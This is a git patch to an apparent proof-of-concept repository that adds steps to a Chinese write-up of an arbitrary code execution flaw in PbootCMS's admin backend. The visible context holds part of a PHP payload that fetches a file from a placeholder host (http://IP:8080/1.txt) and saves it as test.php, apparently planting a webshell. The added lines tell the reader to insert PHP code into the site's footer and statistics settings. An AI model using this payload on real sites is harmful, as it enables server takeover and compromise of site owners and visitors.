From 036d81ddd9d9f8fe3a331e05ce18bf5538caa05a Mon Sep 17 00:00:00 2001 From: wy876 <139549762+wy876@users.noreply.github.com> Date: Tue, 9 Jan 2024 10:17:43 +0800 Subject: [PATCH] =?UTF-8?q?Update=20PbootCMS=E5=85=A8=E7=89=88=E6=9C=AC?= =?UTF-8?q?=E5=90=8E=E5=8F=B0=E9=80=9A=E6=9D=80=E4=BB=BB=E6=84=8F=E4=BB=A3?= =?UTF-8?q?=E7=A0=81=E6=89=A7=E8=A1=8C=E6=BC=8F=E6=B4=9E.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- PbootCMS全版本后台通杀任意代码执行漏洞.md | 3 +++ 1 file changed, 3 insertions(+) diff --git a/PbootCMS全版本后台通杀任意代码执行漏洞.md b/PbootCMS全版本后台通杀任意代码执行漏洞.md index 7c0d765..b695cfd 100644 --- a/PbootCMS全版本后台通杀任意代码执行漏洞.md +++ b/PbootCMS全版本后台通杀任意代码执行漏洞.md @@ -15,6 +15,9 @@ $test("http://IP:8080/1.txt","test.php"); ?> ``` +在尾部信息和统计代码中(其他位置可能效果一样)插入php代码 + + ![image](https://github.com/wy876/POC/assets/139549762/59c806d4-0ad6-41fd-b63e-8fed7966261f) 然后来到全局配置-配置参数